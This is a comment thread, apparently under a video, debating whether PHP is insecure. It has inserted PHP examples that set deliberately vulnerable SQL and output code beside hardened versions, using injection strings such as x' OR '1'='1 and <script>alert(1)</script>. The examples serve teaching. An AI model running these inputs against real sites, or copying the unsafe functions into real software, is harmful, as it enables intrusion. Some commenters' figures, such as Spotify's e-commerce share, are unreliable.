Fun fact: 20 or so years ago I got into an argument with DHH in the comments of my blog, specifically about his comparing Rails (a framework) to PHP (a language). This was on a custom blog, written in PHP, hosted on my iMac, from a trailer park.
PHP is a language designed for the web, whereas Rails is a framework in an allegedly more readable Perl. Ruby is probably more consistent argument-order-wise, but requires learning sigils and odd control flows. PHP is often just HTML with some dynamic server side code that does everything you need as opposed to yet another template language that doesn't quite.
I literally got into an argument with a grad student recently about whether or not PHP was insecure. It was really annoying because I don't even code in PHP but it was really frustrating that someone who is actively studying computer science could have so many misconceptions about the internet. He straight tried to say that websites written with PHP could be taken control of with kali linux. At some point you have to wonder how people get that far in a degree program with such basic misconceptions or no knowledge of what the internet is made of.
DK effect, baby, but a grad student? Sounds like somebody was spending too much time looking at their grades/writing papers rather than learning anything about the internet lol. That sounds like a nightmare.
@darylphuah I remember when I was starting to learn PHP and I asked my teacher why it is unsecure. He answered: "Just try to invade my website if it is so unsecure." And then I shut my mouth. Simply, we can't base ourselves on what random people keep saying about a language or any subject. And then I learned that the problem isn't the language, the problem is those devs that rely on ChatGPT and Reddit opinions.
I honestly don't think it's that surprising. Academia isn't really designed/equipped to convey that sort of practical industry knowledge. Unless their degree was specifically related to cyber security, they're unlikely to have had any direct experience with either offensive or defensive security practices.
Personally I just got into PHP for the job prospects in my local area. Mostly WordPress stuff, but I've been learning Laravel to dip into full-stack, and I can say that I'm starting to love Laravel just for how easy it is to build features and how good the documentation is.
@semyaza555 Not OP, but a somewhat regular Laravel developer. The documentation is incredibly good and full of examples. If you like a more hands-on approach, look at Laracasts; it's a paid resource but with a lot of free content you can pick up and study.
There's... a lot of problems with PHP, and especially wordpress. The foundational security is not really one of them, until you start getting into wordpress plugins. But the architecture of wordpress just... sucks. Wholesale, it's terrible. The language sucks, wordpress sucks, I hate having to deal with it when I get a contract job dealing in PHP.
@nZifnab PHP is ok. WordPress, on the other hand, not that great. The biggest con is that it doesn't have a templating engine to this day, so HTML is mixed with PHP everywhere.
You never heard this? How young are you that you can't remember a time when PHP just spat any query parameters out as global variables, potentially overwriting things like $isadmin? Also the insanity of string tainting. And multiple SQL escaping functions until they finally got it right. It's all fixed now, but that was the state at some point.
The register_globals era: although it was disabled by default two decades ago and its usage was actively discouraged all over the place before being completely removed, it still bit a lot of folks in the 2000s who insisted on using it.
I agree with the point about PHP being used for examples. A lot of the simplest exploits you run into when you start getting into CTFs/learning cyber-security involve dropping a PHP reverse shell on a server. While I am sure PHP can be secure, it is the first thing I look for when 'recreational hacking' since despite being an amateur I know a few common ways to take advantage of PHP. I think that the beginner friendly nature of these exploits makes it easy to say 'PHP is insecure' even if Wordpress is the only place some of the underlying configuration issues are likely to show up.
As PHP and WordPress are so easy to use, they're quite popular, and thus a more likely target to exploit for monetary gain. More popularity also means more code/bugs.
@Ford-ju9yr If it is set up correctly I would not be able to, hence PHP can be secure. Based on my limited understanding, the major concern for any language is any place user input can be processed by the server. So don't upload user files into a directory where PHP might evaluate them (even if you think you are only allowing JPEGs or other safe file types, there can be ways to bypass such filters), make sure you are not evaluating anything coming back from the browser (cookies, query parameters from the URL), make sure that 3rd party code on the server is up to date... You know, the basic stuff.
They can say anything about PHP, but most Linux distros have a page on their wiki dedicated to PHP because it is the fastest way to set up your server and run a website: you just need to upload the PHP files to the server and use Composer for dependencies if you need them.
Nowadays I don't think this is really true. Most modern languages have an http library as part of stdlib that lets you define handlers + has standard file handlers. In golang setting up an http project to respond to most requests serving from a static directory and some special handlers interacting with a db is 15 lines and that's a lower level example. Python doesn't have it in stdlib, but setting up the same thing with common frameworks is 10 lines or similar, and both of those have package managers that handle dependencies for you.
Laravel dev here, and I can say that most use cases can be solved with PHP / Laravel. I haven't seen (correct me if I am wrong) another framework with so many features out of the box and really good docs like Laravel. We get security patches regularly and we even have tools like Laravel Shift to upgrade our projects in the time it takes to fetch a coffee. The ecosystem around PHP and Laravel is HUGE (Pest, Inertia, Livewire, Octane, Forge, Tinker, Herd, ...). Performance is ok for the majority of apps. Even some native tools are coming to life like PHP Native. Of course PHP is not the most popular language in the world, but does that mean it is bad? No. Personally I think most people remember PHP like it was before 7, and I really think that a lot of people would love it if they gave it another chance.
Laravel is great, but it is missing quite a bit of functionality that has to be provided by packages. Nested sets are a great example of something that should just be part of the framework.
Depends how you want to count; there was a reason ASP was mentioned as part of the .NET ecosystem. You also have Blazor for the front end and MAUI for mobile, plus the NuGet libraries. You can pack all of this into one solution for your product, in other words: pages, server, mobile app for Android and iOS, custom libraries, admin tools, all written in one language plus only some XML variant (HTML), which you have with other languages anyway.
@KingSvenDeluxe what exactly is it missing? Its slogan was something along the lines of "batteries included, but replaceable". Additional stuff is provided with their first-party packages for convenience purposes, I would say. Something like role management and others are something that you can whip up yourself with relative ease. It's just that since you started doing it yourself, you maybe think to yourself "well, maybe this Spatie package provides me with all that I need and more, I feel kinda lazy writing this... fine, I'll install that package". They shouldn't really put everything under the sun into the framework, it will become bloated.
As someone who has used MERN and now is trying out Laravel, I can say it has a lot of features out of the box, is easy to use, and the way it forces an architecture on you can be a good point. But its tooling is quite lacking, especially in VS Code, and for a language that (now) has (basic) types built in beside phpdoc, it sure isn't benefiting from them as much as something like TypeScript does. I've also had to set up phpstan beside intelephense to lint the code, and both of those don't agree on which methods exist on which classes, and it's quite a mess. Some things can be quite annoying as well. Like for example, the built-in session authentication will not set sameSite to none because it's overridden by some package. Or setting up UUIDs for all tables requires too much of a workaround. Or the fact that multi-table token authentication almost killed me to implement, and I still don't know how to make sense of the way it works since there are several ways to handle auth and it isn't clear in the docs how it all works. A great framework, but there's also something to be said for a minimal do-it-yourself approach.
(Disclaimer: I'm not through the whole video yet.) PHP is used pretty often in CTFs showing vulnerabilities. That may be one reason people think it's more vulnerable. Also, to the point: if most people are trained on one language's exploits... doesn't that mean that language is more likely to be exploited, making it... more vulnerable...
From what I know of CTFs, usually the PHP vulnerabilities are ones that you could run into with any other language. It's just easier to execute and showcase in PHP. Things such as serialization/unserialization, RCE via shell injection due to the code taking unsanitized user input and slapping it into an exec() statement, SQL injection via unsanitized user input. PHP allows easy access to these foot guns. But you have to go out of your way to actually put bullets into the guns. I.e. take untrusted user input and put it into something that it should never be put into under any circumstance. As such, no. Because it is not a PHP-specific thing you're exploiting, but rather intentionally poorly written code that you are exploiting. It does not make anyone else's PHP instance more or less vulnerable. You are chasing after a concept in the CTFs, not something specific to PHP. Node can do serialization/deserialization of objects. You can shell inject or SQL inject in Python.
I remember about 11 years ago when I discovered PHP and I was mesmerised by how easy it was to develop dynamic web applications by just pasting some PHP code in the HTML, which was a breath of fresh air compared to Java at the time. Even back then the topic of "PHP is vulnerable" was quite popular, but I agree that it's the devs who make vulnerabilities, not the language.
In my time 90% of the issues were MySQL related because, for whatever reason, most devs didn't use prepared statements even though every guide only explained MySQL connections with prepared statements. Really weird.
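An added example, not from the video or any commenter, of the difference the comment above is pointing at: the same lookup written with string-built SQL and with a PDO prepared statement, where the first matches every user for a quote-bearing input and the second matches none. It uses an in-memory SQLite database so it runs offline (only the DSN would change for MySQL); the table, column and function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not from the video or any commenter): string-built SQL beside
// a prepared statement. SQLite in memory stands in for MySQL so this runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT)');
$db->exec("INSERT INTO users (name, password_hash) VALUES ('alice', 'hash-a'), ('bob', 'hash-b')");

// Vulnerable: the value is concatenated into the SQL text, so a quote in the
// input ends the string literal and the rest of the input becomes SQL syntax.
function findUserUnsafe(PDO $db, string $name): array
{
    $sql = "SELECT id, name FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe: the statement is compiled with a placeholder and the value is bound
// afterwards, so it is only ever compared as data, never parsed as SQL.
function findUserSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed form input containing a single quote, the character that breaks
// the string-built query's structure.
$input = "x' OR '1'='1";

foreach (['unsafe' => 'findUserUnsafe', 'safe' => 'findUserSafe'] as $label => $fn) {
    $rows = $fn($db, $input);
    printf("%-6s %d row(s): %s\n", $label, count($rows), implode(', ', array_column($rows, 'name')));
}
```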
I think it's also part of the language design, programming conventions and patterns back then. As stated in the blog, back then, the zeitgeist leaned more onto the ease of use and approachability towards new developers (PHP, Java, JS, VisualBasic, etc.), not with safety and correctness we see highlighted a lot nowadays.
I wish we'd prefer the term unsecure over insecure. Unsecure definitely means a security risk, and not that the language has confidence and self-esteem issues.
I am a professional web dev and we use php 8.2 ... it's almost as if you're writing C# or Java when you use strict typing (literally a php feature these days)
PHP is extremely insecure. I have seen thousands of hacked websites and thousands of vulnerabilities that should not exist. I believe a language/framework is supposed to provide safety nets from common pitfalls. A few examples: in_array is not reliable up to 7.4. Most XSS vulnerabilities are there because PHP does not escape things by default, like ERB in Rails, for example. And 100 other reasons...
Which does not say anything about PHP but rather about the PHP developers who most likely use vanilla PHP and have no idea what they are doing. (Also as mentioned in the video, most websites run on PHP so obviously most vulnerable websites will also be written in PHP)
"You can't tell it's PHP code unless you see the extension." IDK what he means by that, but the dollar signs in front of all the variables is a pretty good sign I'm in PHP-land. That or Bash, and I'm not sure which is worse. Also, "only a bad craftsman blames his tools" is just factually untrue. Only a bad craftsman blames his tools _for bad work,_ sure, but good craftsmen will 100% say their tools are bad and blame bad tools for slow and frustrating work. Bad tools are bad tools, and anyone who says "only a bad craftsman blames his tools" are bean counters/cheapskates/managers/old farts who have never used the right tools in the first place and probably don't work anymore (or worse, they've never even done the work in the first place), so they need to shut up and go home. Yes, I'm salty about this, I've heard it far too often back when I was in carpentry. Mostly from old farts who would lead every sentence with "back in my day" when "my day" precluded the existence of hydraulic machinery and widespread electricity.
My full stack class in college did 2-4 weeks in php. I thought it was a great introduction. Way less complicated than the end of the class that introduced “The Frameworks”. Seems like a straight forward approach to doing complicated things. I did however not like the global state nature of it. Seemed short sighted.
The language evolved from a toy technology that some guy used to develop his own home page (Personal Home Page). There are a few things that are short sighted due to this legacy.
Indeed you have global state because everything is run in context of one request, so that request is your whole "world". But I don't think that's an issue really. If you mean global variables and other stuff which is practically global (service containers in frameworks etc) then it's optional and mostly discouraged. Still, you can do a ton of weird stuff in PHP and make extremely hard to understand code.
As a full time php dev, I can say it is an okay language. Security is no issue and the language has become much more developer friendly and oop-rich since PHP 7.0 release in 2015. I still would not generally recommend the language, because it is only useful for backend. A lot of languages can do backend, and at the same time be used as command tools, frontend and non-web related stuff.
One of my major issues with PHP is that it's a script language. It runs the script then stops. That's great for simple websites, but the moment you need to do something like keeping track of the amount of requests you're doing for rate limiting, you need something external to keep track of it. With any other language that doesn't stop running once a request has been processed, that problem is fairly trivial. While it can obviously be trivial in PHP as well, there's just a lot more to it. I think it's really nice because of the simplicity and PHP 8.2 has introduced some really nice toys to play with, but I'd still pick most other languages over it.
@CottidaeSEA I'd argue that if you're rate limiting you need something external to keep up with it anyway. Companies are going to ask why they're being rate limited, etc. Not only that, in the case of a crash/reboot you'd ideally want your limits to be cached & reloaded upon reboot.
@Microtardz That could be done through a database. Also, the throttling isn't enforced in our system, it's adhered to: the external system has a request limit so we need to ensure we don't break it. As such, throttling can be necessary and in certain cases with fine-grained control if some requests are more important than others. All of which could've been done through PHP and a database if it didn't shut down after request completion. There is stuff like OpenSwoole which actually keeps everything running, but that also requires a fundamental change to session management.
I would say PHP is vulnerable because there are 7800+ CVEs against PHP, where Rails has 193. In both cases, these are applications built on the language. Given GitHub and Spotify are Rails applications and Spotify handles 10% of e-commerce during Xmas, they must be secure.
I'm really wondering why you are trashing Joomla here. From the myriad of PHP CMS, Joomla probably is the most solid one out there. Especially comparing to the "market leader"...
I don't mean that sarcastically. Joomla has flaws, but the flaws I mean are rather minor, and from past discussions it always turned out that people's opinions were formed by experiences from 15 years ago, while they were always astonished by what Joomla does, especially compared to WordPress.
Back in the day, PHP's brilliant ideas on how to secure applications would instill me with confidence. "There's no way these guys don't know what they're doing", I'd think.
00:37 I think from that $_GET can contain array values (from a query string like "a[]=1&a[]=2") but the PHP author assumed that values can only be strings. There is no mention of syntax like "a[]=1&a[]=2" in the $_GET documentation, btw. Edit: there is, but in the "Variables From External Sources" page.
The page about $_GET is in line with all other pages about superglobals, explaining their general content. GET, POST and REQUEST all link to "Variables from external sources", where the general concept of receiving data is explained (no use to maintain copies of that on all three previous pages if you can link to a "see also" page instead), and has both an example and a link to the FAQ page where this topic is also discussed. It is admittedly a challenge to find the correct search terms to find the page you need explaining the thing you struggle with - the PHP documentation is still quite good.
PHP encourages writing insecure code by its very design. And the article pretty much says "yeah, so there are foot guns lying around, but you're not necessarily forced to use them". Well, my brother in Ch, if they are lying around, someone's going to use them. They cannot be removed precisely for the reason that someone IS actually using them. If these were simply legacy features nobody uses, they would have been deprecated by now and removed.
I am in the position to know that a lot of less experienced devs write important code. PHP suffers from bad press, I get that, but that doesn't change the fact that when you go to learn it you are essentially taught to raw dog PHP, at least that was the case for me. What PHP needs is a wave of new up-to-date tutorials on how to write it properly. No, setting up WordPress is not a PHP tutorial, and most people get it wrong.
What drove me away from PHP, really, was how laser-focused it is on web development (maybe this has changed, please correct me if I'm wrong). This is not a bad thing, especially today, but I prefer languages with wider use cases. By the way, when I saw Laravel for the first time I was mind-blown, such a good framework; every need of web development under the sun is probably implemented and well maintained in that framework.
Ok, I need to counter the "a poor worker blames his tools" point from the article. The point of that saying isn't that bad tools don't exist, or that a good worker will be able to do good things with bad tools - it's that a good worker will ensure they have appropriate tools. In this context, that means the proverbial good worker will try out PHP, see the problems, then find something better, while the proverbial bad worker will try out PHP, see the problems, then just keep using it anyway because they're too lazy to learn a new tool, probably ending up in denial about it and making cope-posts online about how all the PHP hate is unjustified. Or maybe PHP isn't a bad tool. Either way, don't use that saying as a counter to criticism of a tool, because it's not.
I am toying with the idea of writing a full blog post about this because this argument comes up over and over. It drives me nuts when people say stuff like "well, all languages have flaws"... quietly disregarding the fact that PHP has more/bigger flaws. It leads to this implication that there is no such thing as quality in programming languages, which is just not true. The very fact that each release to a language adds/deprecates features suggests that they want to move closer to perceived perfection. TLDR your comment is spot on.
Learn the best security practices from the beginning when handling databases with PHP and you're pretty much good. PHP is up to snuff when it comes to security these days. Really have had zero problems utilizing AWS EC2 (running LAMP stack) + Secrets Manager. Shit's pretty secure, would recommend.
It’s even nicer that we don’t have to ask Stack Overflow or Reddit our questions anymore, since none of those people are capable of contributing to the benefit of themselves or humanity, anyway. ChatGPT understands PHP infinitely better than anyone on literally any modern forum just about ever. Can’t see one nearly invisible error? Just ask Chat and the fix is nearly immediate on the first question. T_T
13:45 No, it isn't the same thing. Uninformed just means that somebody doesn't know about something. Ignorant is worse, people who are ignorant about some things actively don't want to know about it and refuse to change their opinion even if faced with the contrary.
My professor almost flunked my FYP because I used Laravel, cuz PHP is insecure………. I explained to him how SSR and the framework have gates to stop the known vulnerabilities he noted. And he still wanted to flunk me, even though the main code bits are not in the website side of things; it's just for me to host the application…
Love that article, my thoughts exactly. The only way I see raw PHP being vulnerable is by negligence. PHP is not strongly typed, so if you don't typecheck or typecast your inputs, or forget to sanitize anything, your application becomes vulnerable. A PHP program is only as good as the programmer writing it. That example takes an unsanitized input "$_GET" and pumps it straight into an unsanitized output "echo". What do these people complaining about security expect? PHP does what you tell it to do. It's the same as with HTMX and people complaining about it making XSS possible.
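An added example, not from the video or any commenter, that puts three raw-PHP points from this thread side by side: the "$_GET straight into echo" pattern from the comment above, the array-valued $_GET entries mentioned at 00:37, and the loose-comparison in_array() trap raised earlier. The unsafe handler is shown beside a hardened one; function and parameter names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not from the video or any commenter). Raw-PHP pitfalls from
// this thread, side by side:
//   1. $_GET values are not always strings: ?q[]=1&q[]=2 makes $_GET['q'] an array.
//   2. echo without escaping turns user input into markup (reflected XSS).
//   3. in_array() without the strict flag compares loosely.
// Function and parameter names are assumptions made for this example.

// Vulnerable: assumes $q is a string and emits it unescaped.
function renderSearchUnsafe(array $get): string
{
    $q = $get['q'] ?? '';
    // If $q is an array, interpolation yields "Array" plus an
    // "Array to string conversion" warning; if it is a string it is emitted raw.
    return "<p>Results for: $q</p>";
}

// Hardened: rejects non-string input, allowlists the sort parameter with a
// strict in_array(), and escapes before output.
function renderSearchSafe(array $get): string
{
    $q = $get['q'] ?? '';
    if (!is_string($q)) {
        // Arrays (q[]=...) are rejected rather than coerced. A real handler
        // would also send a 400 status here.
        return '<p>Invalid query.</p>';
    }

    $sort = $get['sort'] ?? 'asc';
    // The third argument enables strict (===) comparison. Without it, PHP < 8
    // evaluates in_array("anything", [0]) as true because "anything" == 0;
    // PHP 8 changed string/number comparison, but strict mode is right on any version.
    if (!is_string($sort) || !in_array($sort, ['asc', 'desc'], true)) {
        $sort = 'asc';
    }

    // ENT_QUOTES escapes both quote styles, so the value is safe in text and in
    // attribute values; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking the output.
    $safeQ = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Results for: $safeQ (sorted $sort)</p>";
}

// Constructed inputs standing in for $_GET so the script runs from the CLI.
$requests = [
    ['q' => '<script>alert(1)</script>'],     // the classic reflected-XSS test string
    ['q' => ['1', '2']],                       // what ?q[]=1&q[]=2 produces
    ['q' => 'shoes', 'sort' => 'name; DROP'],  // sort value outside the allowlist
];

foreach ($requests as $r) {
    echo "unsafe: ", @renderSearchUnsafe($r), "\n";   // @ only silences the array warning
    echo "safe:   ", renderSearchSafe($r), "\n\n";
}
```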
I recall reading somewhere an analogy of PHP developers being like carpenters with odd tools making misshapen houses and yelling at you because when you open the front door and the back wall falls over, as if it's your fault and not theirs for making a shit house. That's you. Good tools make The Right Thing easy and the default, and The Wrong Thing hard, if not impossible. PHP does the exact opposite (and to be fair, in a lot of ways, so does JS), which you've so neatly demonstrated, which is why it gets the ire that it does.
@@BloodEyePact Uhh getting, personal already. I don't yell at my clients if something breaks. I simply fix it. You don't need PHP to create a garbage System. To stay with your analogy, If you have multiple carpenters work on the same piece of carpentry, but each one can only work if they have the specific tools, they are used to, then things get crowded in the workshop quickly. I had to work on a Node project once that used Bootstrap, PicoCSS, and Tailwind all glued together with some custom CSS, All because each previous dev was conviced, his/her favorite CSS Framework is "The thing" that will make things easier and better, but then they failed to adapt, what was already there to their "easier to use" framework. Keep it simple. You don't need a Hammer factory if all you want to do is put a nail in the Wall.
@@AScribblingTurtle Don't misunderstand, I'm not claiming you yell at your clients, I'm pointing out that you are blaming PHP developers for using the common default way of doing things and those turn out to be extremely dangerous. PHP is not made any better by the fact that you can create garbage with anything, the issue remains that it makes it easy to make garbage, and hard to make something good, because every feature requires complex, specific boilerplate to make it work the way it ought to have worked in the first place, and the way most people will think it works until they find out the hard way. Its complexity is not the issue at hand, though its certainly not its strong suit, just take a look at the size of the "standard" library of thousands of functions with extremely specific behaviors and use cases. Finally, comparing PHP to browser languages is a bad comparison. Browsers support HTML, CSS and JS, so you're stuck with them unless you want to venture into WASM. PHP is server side, you made a conscious choice to use garbage. The choice to use PHP over just about any other language for new projects is negligence.
@@BloodEyePact Many PHP "standard" features stem from core extensions, that you can install or uninstall as you please, to save on loading times, etc. At least they are a standardized source. What do Node, Go and Rust have for example? A package ecosystem, that is filled with dozens of packages, that do the same thing. Some of which seem to work as intended until you hit an edgecase and find out the hard way, that they don't. (And before you mention it. I'm not a huge fan of composer, either. It just brings the flaws of a dependency-based package system like NPM to a language that does not need them. IMO) I agree with your sentiment about complexity not being PHP's strong suit. Use the right tool, for the right job. You don't use PHP if you need highly responsive applications. Just as you don't hammer a nail with a Screwdriver. And finally, if I can't compare the structure of a Client- to a Server application, let's take a Server-side Example instead. A few years back I had to work on a Node - Server, that used the 'mongodb', 'mongoose', and 'mongojs' packages all to connect to the same MongoDB, within the same project. It is easy to create garbage in any language. The Handholding that many younger Devs expect a language to do is ridiculous. The goal of the software is UX, not DX. PHP is a scripting language. All that Handholding costs valuable running time on EVERY call, just so the dev doesn't have to think ONCE about what he/she writes. You say it should work like people "think" it does? What happened to "learning your tools"? Finding out "the hard way", that something does not work is called learning. "Uhhh, I don't want to learn, I went through a 2 Week bootcamp and now I just want to write code I think is correct and grab a quick paycheck. memememe."
@@BloodEyePact nothing really comes close to PHP when it comes to shipping a server side solution. Most of the "problematic defaults" have been addressed for about 10 years. If you're stuck in that time.. that's your problem. Other "pro" languages like C/C++ gives you an even bigger gun to shoot your foot with. So using that as an argument doesn't really make sense.
Sometimes it seems like JS is the kid everybody is talking about how great it is while it tries to hide its flaws while PHP is just doing its thing in the background.
My friend works at a security company that probes for the various technologies used by vendors. Insecure and out of date PHP applications are still the majority of insecure and out of date applications out there.
You said it right there with "insecure and out of date". Its longevity means there are apps that run but no dev has touched them in forever. Similar story with many Windows EXEs. Nothing to do with PHP IMHO, other than it's been around a long time and happens to power more sites on the web than anything else.
Infosec guy here. PHP is typically considered insecure not because it's a bad language or insecure because of libraries or anything like that. Generally it's the same as any other language, but PHP is generally more annoying to update to newer versions. Maintaining php is very annoying and often a nominal upgrade means a ton of work in testing.
There are managed PHP hosts and deprecation warnings are logged before features like magic quotes are removed in the next version. Tests should be automated anyway, because the website probably changes more often than there are mandatory upgrades to a new backwards-incompatible version.
@CTimmerman If you see "managed host" you can often think "shared host". In shared hosting environments, companies tend to maintain multiple servers with different versions of PHP on them and move applications to whichever server has the version they need. Unfortunately most people don't maintain their apps, and the servers with older versions end up full and the biggest resource hogs. Thankfully these days containerization is making that less of a problem. GDPR made shared hosting mostly infeasible in the EU. That said, the fact that "hosted PHP" is a feature demonstrates the pain of maintaining PHP.
Do you have an example? One of PHP's strongest and most annoying points is its backwards compatibility. In my previous job, we updated some legacy PHP5 code (which still had PHP4 syntax in some areas) all the way up to PHP 8.2 in about a month. No issues.
> PHP is generally more annoying to update to newer versions
Harder than what? Node? Updating JavaScript libraries is a nightmare, and you have to do it all the time because the entire JavaScript ecosystem is full of critical vulnerabilities every other week. I would know, I get the dependabot alerts for it. Python? Python 2 to 3 was a literal nightmare. Java? Oh god, please let's not get into jar hell or war files. ASP? Well, you've got me there, I've never used it. Honestly speaking, I can't think of the last time updating PHP was a pain. Largely because everything was already following best practices such as using typed equality instead of loose equality everywhere. Going from 5.6 to 8.2 has been virtually painless over the years.
I think the problem stems more from educational content. Find me a file upload tutorial that doesn't end up putting this new uploaded file into a /accessible/to/the/request/malicious.php. This doesn't mean PHP is insecure; it is the implementation, which a lot of the time seems to derive from poor educational content and the same people not wanting to understand the same thing in a deeper context. Frameworks have since made this much simpler by enforcing that public directory and ensuring storage paths are not accessible by URL, but then most educational content will start telling you to symlink it to public…. Back at square one again.
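An added example, not from the video or any commenter, of the upload pattern the comment above says tutorials skip: the file is stored outside the web root under a server-generated name and handed back only through a script that sets the Content-Type itself, so no request path ever maps onto an uploaded file. The storage directory, function names and MIME allowlist are assumptions, and the CLI demo feeds a constructed PDF header through the same code path instead of a real $_FILES upload.

```php
<?php
declare(strict_types=1);

// Added example (not from the video or any commenter). Uploads never land under
// the document root and never keep a client-chosen name or extension.
// STORAGE_DIR is an assumed location one level above the public directory.
const STORAGE_DIR = __DIR__ . '/../storage/uploads';

// Illustrative allowlist: detected MIME type => extension the server assigns.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'application/pdf' => 'pdf'];

// Takes the path of a file already received (tmp_name from $_FILES in a real
// handler) and returns the opaque id a client may later use to fetch it.
function storeUpload(string $tmpPath, string $storageDir = STORAGE_DIR): string
{
    // Type is decided from content, not from the client's filename or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('unsupported file type');
    }
    if (!is_dir($storageDir) && !mkdir($storageDir, 0750, true)) {
        throw new RuntimeException('cannot create storage dir');
    }
    // The name comes from the server, so "../" segments or ".php" in the
    // original filename never reach the filesystem.
    $id = bin2hex(random_bytes(16));
    $dest = $storageDir . '/' . $id . '.' . ALLOWED[$mime];
    // A real request handler uses move_uploaded_file($tmpPath, $dest) here;
    // rename() is used so the example also runs from the CLI with a local file.
    if (!rename($tmpPath, $dest)) {
        throw new RuntimeException('store failed');
    }
    chmod($dest, 0640); // readable by the app user, not executable by anyone
    return $id;
}

// Serves a stored file by id. The URL never names the file, and the response
// type is fixed by the server, so the web server cannot be tricked into
// executing the upload as PHP or letting the browser sniff it as HTML.
function serveUpload(string $id, string $storageDir = STORAGE_DIR): void
{
    if (!preg_match('/\A[0-9a-f]{32}\z/', $id)) {
        http_response_code(404);
        return;
    }
    foreach (ALLOWED as $mime => $ext) {
        $path = $storageDir . '/' . $id . '.' . $ext;
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('X-Content-Type-Options: nosniff');
            header('Content-Disposition: attachment; filename="' . $id . '.' . $ext . '"');
            readfile($path);
            return;
        }
    }
    http_response_code(404);
}

// CLI demonstration with a constructed PDF header in place of a real upload.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "%PDF-1.4\n% constructed placeholder, not a real document\n");
$id = storeUpload($tmp, sys_get_temp_dir() . '/example-storage');
echo "stored under id $id, outside the web root\n";
```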
It's not the language, it hardly ever is, it's the developer and the ecosystem that are the main problems. That's why most JS is so garbage, too many inexperienced devs writing rubbish while using trash packages. PHP is a fine language these days, Laravel is pretty good... but then TurdPress still sticks around like a bad smell. TurdPress compounds poor code with a plugin ecosystem that is just the absolute worst.
I used PHP professionally for several years, and while it HAS made huge leaps I still can't stand the language. As for it being insecure, IMO the existence of features like extract() and using PHP for templating DO make it easier to write certain types of vulnerabilities regardless of what framework you're using IF you use those features. Sure you can avoid using unsafe features and have high standards for your code, but there are some foot guns that exist in PHP that I haven't seen in any other language.
PHP's security originated from its ease. It was so easy that bad programmers could throw together a website and think that it's perfect. PHP is an effective tool, I just hate using it.
PHP used to be absolute shit (version 3); you had to tweak the out-of-the-box php.ini, turning off things like register globals. And I still use Perl. Not as a CGI. I use HTML::Mason and it lets you write Perl the same way you do PHP.
That was a straw man argument. The argument has never been that the language was insecure, it is just that many of the applications written with PHP were insecure. 20 years later some of the apps have cleaned up their security, but that doesn’t change history.
Imagine having builtin templating capabilities to embed HTML inside the language only to prohibit using it and instead rely on an external tool (e.g. Blade) that has pseudo-PHP syntax, is very limited and has to be built into actual PHP…
@@rcmnet *Competent devs. To this day I find injectable DB access because someone in the company wrote it decades ago and "if it works, don't touch it". Some senior devs write it like this to this day, or at least copy-paste it from "parts that work".
My little noobie nerds! Just because "ex-Googlers" or any other "big tech" "super developers" and successful influencers complain about PHP or any other language, it doesn't mean that they are right! Use the language of your choice and just let them be influencers. At the end of the day, all that matters is if you did your job and earned the money for this job. With my respects!
We have a service built by a 3rd party in Laravel PHP. Out of all our services, this gives us the most issues from our security scans. We have several services written in TypeScript and C# but it's our one service written in PHP that gives us the most issues. Maybe the developers used bad 3rd party packages, idk. But it gives me the impression that PHP is insecure without knowing much about the ecosystem of the language.
I'm okay with programming languages being insecure as you have to start somewhere. Programmers work at the boundary between the unsafe computer and the safe user environment. The idea of "safe at all costs" is bullshit. Footguns are another story.
When PHP ran 90% of the web in the '90s, most of the vulnerabilities showed up in PHP. And of those, how many WordPress sites had default admin settings or weak MD5 passwords stored simply?
The author of that post confused me. RAW PHP is insecure? And using a framework will make it secure? It's not the problem of the language then. It may be a problem with who is using it or how we use PHP. hehehe
Depends on the requirements quite a bit.. But if I didn't need a lot of weird integrations I'd go with Haskell / IHP. If I need support for lots of corporatey stuff I'd go with F# / Falco (+ Fable).
In the best case, sure, it's probably safe. The problem is 90% of it happens to be in use on wordpress sites, which are known to be hilariously unsecure.
Wordpress is not insecure by default. It's "just" that it is *extremely easy* to make a theme or plugin with security vulnerabilities without even trying.
Yeah a blank page might be less of an issue, but anything worth securing won't be a factory install of WordPress, it will have dozens of plugins.
@@zekicay Even then, if you look at exploit trackers, there's a new core issue every few weeks. That's less than the daily ones related to plugins, but it's still really bad.
It's the WordPress dilemma. They are reaching and marketing towards a non-technical audience, therefore, they have to simplify and abstract away a lot of the stuff a newcomer might find difficult. A lot of that code kinda becomes ugly fast.
@@oserodal2702 WordPress, even after so many years, hasn't adopted or created any templating engine (which would give you some guidelines). Everything is in a PHP file if you want to, like 20 years ago (queries, 'RAW' PHP, some CSS, some JS, some hooks, some PHP templating). Template overriding: you can do it with files, you can do it with hooks, you can do it however. So, no structure. Defining a theme by a CSS file :'). A freaking JSON or YAML for defining a theme? WordPress is still trying to escape the jQuery nightmare and badly written JS code from plugins. WordPress database design sucks, or maybe I could say it does not have one. Either you write custom queries to optimise your website, OR you make almost 150-300 requests on page load when you have a lot of custom fields. Security is a non-existent subject - the abstract functional coding approach and all the folders that have to be publicly accessible for WordPress to work - it is just bad. wp-content/[plugins/**, themes/**, and so on]. When a lot of badly coded plugins are publicly available (the code - on your server), anyone can find exploits! WordPress, unfortunately, powers millions of websites, so it's an easy target as well as a hot one. It's a mess, and it's a mess associated with PHP. I see developers make 'APPS' or use WordPress as a CMS for an API, god dammit. But PHP 8+ is great @oserodal2702
I think PHP IS insecure, but not because of the reasons in the article. PHP has some really bad functions that can do much more than almost anyone really needs. In later versions some of those "features" can be disabled in config, but a lot of defaults are not great for security. Old APIs for system interactions or interop are archaic and booby-trapped.
Skipped through the entire video & only saw one line of actual code that didn't even illustrate his point. It was literally just echoing the result of a concatenated string 😂
